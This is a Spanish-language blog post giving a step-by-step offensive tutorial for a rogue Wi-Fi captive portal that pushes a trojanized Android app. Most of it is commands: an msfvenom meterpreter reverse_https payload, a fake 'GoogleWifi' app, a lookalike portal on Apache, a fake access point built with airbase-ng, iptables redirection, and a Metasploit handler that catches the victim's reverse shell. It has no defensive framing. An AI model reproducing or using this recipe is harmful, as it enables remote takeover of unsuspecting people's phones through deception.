jueves, 15 de diciembre de 2016

Portal cautivo con troyano

En primer lugar, creamos el payload

msfvenom -p android/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=4895 -o meterpreter.apk



Si queremos, crearemos una aplicación falsa que supuestamente nos dé conexión internet. Infectamos la aplicación GoogleWifi tal y como vimos en el post http://manugomez1977.blogspot.com.es/2016/10/infectando-apk.html

Creamos una página web parecida a la que sigue a continuación




Lo copiaremos todo en una carpeta llamada, por ejemplo GoogleWifi, dentro de /var/www/

editamos 000-default.conf y añadimos



Editamos el archivo /etc/apache2/ports.conf y añadimos



Editamos el archivo /etc/apache2/sites-available/000-default.conf y añadimos



Editamos /etc/apache2/sites-enabled/000-default.conf y añadimos (si no ya está relleno, porque a veces se rellena automáticamente)



Iniciamos el servidor apache

service apache2 start

Creamos un AP falso (si tenéis alguna duda, consultad el post:
http://manugomez1977.blogspot.com.es/2016/06/crear-una-red-wifi-falsa.html) de la siguiente manera (en mi caso, wlan0 da internet y wlan1 es la red falsa):

En una terminal ponemos:

ifconfig wlan1 up
airmon-ng start wlan1
airbase-ng -c 1 -e GoogleWifi wlan1

En otra terminal:ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp -j REDIRECT --to-port 55555
iptables -t nat -I PREROUTING -p tcp --dport 4895 -j ACCEPT
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0



En otra terminal, abrimos metasploit:

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_https
set LHOST 10.0.0.1
set LPORT 4895
exploit

Cuando la víctima abra la app:




Se iniciará meterpreter, en ese momento, abriremos una nueva terminal y ponemos:
iptables -t nat -I PREROUTING -s <ip_victima> -p tcp -j ACCEPT
iptables -t nat -A PREROUTING -s <ip_victima> -p tcp -j ACCEPT


Para darle así internet.










No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.